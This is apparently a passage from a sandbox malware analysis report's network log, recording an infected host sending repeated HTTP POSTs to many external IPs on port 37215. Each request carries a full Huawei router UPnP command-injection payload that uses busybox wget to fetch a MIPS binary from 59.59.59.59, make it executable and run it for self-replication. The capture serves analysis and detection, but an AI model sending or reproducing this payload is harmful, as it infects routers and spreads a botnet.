2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1285192.168.2.1539786172.134.239.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810157061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1286192.168.2.1554288157.130.102.9537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810157061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1287192.168.2.153585841.93.124.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810187101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1288192.168.2.153424041.150.227.22437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810220957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1289192.168.2.154222241.238.202.11437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810256958 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1290192.168.2.154126441.54.87.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810488939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1291192.168.2.1545310197.55.206.4937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810533047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1292192.168.2.154354441.121.127.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810636044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1293192.168.2.153971441.234.239.7937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810662031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1294192.168.2.155750241.152.122.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810693026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1295192.168.2.1545610157.174.18.16437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810719013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
